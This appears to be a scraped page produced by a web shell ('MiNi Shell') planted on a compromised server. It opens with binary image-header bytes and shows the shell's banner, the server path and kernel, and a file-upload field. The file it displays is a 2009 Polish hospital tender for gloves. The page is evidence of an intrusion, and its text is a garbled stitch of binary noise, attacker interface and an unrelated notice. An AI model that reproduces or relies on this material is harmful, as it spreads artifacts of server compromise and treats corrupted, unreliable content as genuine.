JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/22880-N-2009.html

<p class="kh_header"><b>Radom: zakup i dostawa rękawiczek foliowych, diagnostycznych ,sekcyjnych i gospodarczych dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 22880 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa rękawiczek foliowych, diagnostycznych ,sekcyjnych i gospodarczych dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres nr 1: rękawice foliowe
Lp.
	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	
Rękawice foliowe , niesterylne, rozm. M (damskie), L(męskie)
	1.643 400 szt.


Zakres nr 2: rękawice diagnostyczne niesterylne
Lp.	Przedmiot zamówienia
	Orientacyjna ilość w okresie 2 lat 
1	rękawice diagnostyczne niesterylne-
 lateksowe, zabiegowe ,rozm. XS-XL	1.164 200 par.
2	rękawice diagnostyczne niesterylne-
nitrylowe, bezpudrowe, rozm. XS-XL	4.800 par.
3	rękawice diagnostyczne niesterylne-
lateksowe, antyalergiczne, bezpudrowe, rozm. M-L	6.000 par.


Zakres nr 3: rękawice chirurgiczne sterylne
Lp.	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	Rękawice chirurgiczne sterylne, lateksowe, pudrowe, rozm.	230.000 par.
2	Rękawice  chirurgiczne sterylne, lateksowe, bezpudrowe, rękawiczki polimeryzowane, niechlorowane ,rozm.	    2.400 par.
3	Rękawice  chirurgiczne sterylne, podwójne, rozm.	    3.600 par.

Zakres nr 4: rękawice sekcyjne
Lp.	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	Rękawice niesterylne , sekcyjne, rozm.	4.800 par.

Zakres nr 5: rękawice gospodarcze
Lp.	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	 Rękawice robocze dla pracowników zatrudnionych na stanowisku robotniczym:
- pięciopalcowe
- wykonane z tkaniny (sztruks, jeans) wzmocnione dwoiną bydlęcą	 990par
2	Rękawice robocze dla pracowników zatrudnionych na stanowisku robotniczym:
- pięciopalcowe,
- bawełniane,
- wewnętrzna strona rękawic podgumowana	375 par
3	Rękawice gospodarcze gumowe dla pracowników zatrudnionych na stanowisku robotniczym, przy wykonywaniu czynności, polegających na załadunku i transporcie odpadów medycznych:
- pięciopalcowe,
- wykonane w całości z gumy,
- odporne na możliwość przekłucia i działanie środków chemicznych stosowanych przy dezynfekcji sprzętu medycznego i pomieszczeń przeznaczonych do przechowywania odpadów medycznych (np. medicarine, podchloryn sodu, itp.)	360 par
4	Rękawice spawalnicze
	10 par.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0, 33.90.00.00-9, 18.14.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu jest wniesienie Wadium.
1.1 Zamawiający określa wadium w wysokości: 
Zakres nr 1:         986,00      PLN ( słownie: dziewięćset osiemdziesiąt sześć PLN )
Zakres nr 2:      5.330,00      PLN ( słownie: pięć tysięcy trzysta trzydzieści   PLN )
Zakres nr 3:      3.600,00      PLN ( słownie: trzy tysiące sześćset    PLN )
Zakres nr 4:         331,00      PLN ( słownie: trzysta trzydzieści jeden   PLN )
Zakres nr 5:     :         102,00      PLN ( słownie: sto dwa    PLN )<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki ogólne: Wykonawca nie może podlegać wykluczeniu z postępowania o udzieleniu zamówienia na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp.
2.	Warunki szczegółowe:
1)	Potencjał kadrowy: Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób niezbędnych do wykonania przedmiotu zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
2)	Doświadczenie: Wykonawca posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia/ min. 2 dostawy/. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę. 
3)	Potencjał techniczny: Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
4)	Potencjał finansowo-ekonomiczny: Wykonawca dysponuje własnymi środkami finansowymi zapewniającymi wykonanie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
3.	Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie załączonych dokumentów i oświadczeń wg. formuły spełnia- nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp.
2.	Oświadczenie Wykonawcy  o spełnianiu warunków  określonych w art. 22 ust 1, pkt. 1-3 ustawy Pzp.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej albo w przypadku Wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa on dokument wystawiony w kraju, 
w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji, ani nie ogłoszono jego upadłości. Jeżeli w kraju pochodzenia osoby, lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby, lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4. Próbki oferowanego towaru - po 5 próbek z każdej pozycji dla zakresu nr 2 i nr 3. Wykonawca ma prawo do ubiegania się (na pisemny wniosek Wykonawcy) o zwrot kosztów za zużyte podczas oceny jakościowej próbki. Rozliczenie za zużyte próbki będzie się odbywało po cenach jednostkowych brutto określonych w ofercie danego Wykonawcy.
5. Opis oferowanego towaru katalogi, foldery itp.
6. Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczony przedmiot zamówienia odpowiada określonym normom lub specyfikacjom technicznym, tj.:
a)	deklaracja zgodności CE wystawiona przez producenta lub
b)	certyfikat jednostki notyfikowanej uczestniczącej w procesie notyfikacji zgodnie z ustawą z 20 kwietnia 2004 r. o wyrobach medycznych (tekst jedn. Dz. U. z 2004 r. Nr 93 poz. 896) lub
c) zaświadczenie o wpisie do Rejestru Produktów Leczniczych, Wyrobów Medycznych  i Produktów Biobójczych oferowanego towaru.
7.Pełnomocnictwo do reprezentowania  o ile ofertę składa pełnomocnik.
8. Zasady składania oferty przez podmioty występujące wspólnie- Podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa  do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
9. Dowód wniesienia wadium.
10.Informacja o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Wykaz wykonanych minimum 2 dostaw w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres działalności jest krótszy - w tym okresie zamówień odpowiadających swoim rodzajem i wartością dostawą stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Informacja musi potwierdzać spełnienie warunku . Do informacji muszą być załączone dokumenty potwierdzające, że wymienione w informacji usługi zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - jakość - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny, Dział Zamówień Publicznych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4 - Budynek Przychodni Specjalistycznych i Dyrekcji III piętro pok. 308, 309, 309A i 313.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2009 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny, Dział Zamówień Publicznych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4 - Budynek Przychodni Specjalistycznych i Dyrekcji  III piętro pok. 308, 309, 309A i 313.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> rękawice foliowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 1: rękawice foliowe
Lp.
	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	
Rękawice foliowe , niesterylne, rozm. M (damskie), L(męskie)
	1.643 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> rękawice diagnostyczne niesterylne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 2: rękawice diagnostyczne niesterylne
Lp.	Przedmiot zamówienia
	Orientacyjna ilość w okresie 2 lat 
1	rękawice diagnostyczne niesterylne-
 lateksowe, zabiegowe ,rozm. XS-XL	1.164 200 par.
2	rękawice diagnostyczne niesterylne-
nitrylowe, bezpudrowe, rozm. XS-XL	4.800 par.
3	rękawice diagnostyczne niesterylne-
lateksowe, antyalergiczne, bezpudrowe, rozm. M-L	6.000 par..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> rękawice chirurgiczne sterylne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 3: rękawice chirurgiczne sterylne
Lp.	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	Rękawice chirurgiczne sterylne, lateksowe, pudrowe, rozm.	230.000 par.
2	Rękawice  chirurgiczne sterylne, lateksowe, bezpudrowe, rękawiczki polimeryzowane, niechlorowane ,rozm.	    2.400 par.
3	Rękawice  chirurgiczne sterylne, podwójne, rozm.	    3.600 par..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> rękawice sekcyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 4: rękawice sekcyjne
Lp.	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	Rękawice niesterylne , sekcyjne, rozm.	4.800 par..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> rękawice gospodarcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 5: rękawice gospodarcze
Lp.	Przedmiot zamówienia	Orientacyjna ilość w okresie 2 lat
1	 Rękawice robocze dla pracowników zatrudnionych na stanowisku robotniczym:
- pięciopalcowe
- wykonane z tkaniny (sztruks, jeans) wzmocnione dwoiną bydlęcą	 990
2	Rękawice robocze dla pracowników zatrudnionych na stanowisku robotniczym:
- pięciopalcowe,
- bawełniane,
- wewnętrzna strona rękawic podgumowana	375
3	Rękawice gospodarcze gumowe dla pracowników zatrudnionych na stanowisku robotniczym, przy wykonywaniu czynności, polegających na załadunku i transporcie odpadów medycznych:
- pięciopalcowe,
- wykonane w całości z gumy,
- odporne na możliwość przekłucia i działanie środków chemicznych stosowanych przy dezynfekcji sprzętu medycznego i pomieszczeń przeznaczonych do przechowywania odpadów medycznych (np. medicarine, podchloryn sodu, itp.)	360
4	Rękawice spawalnicze
	10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.10.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com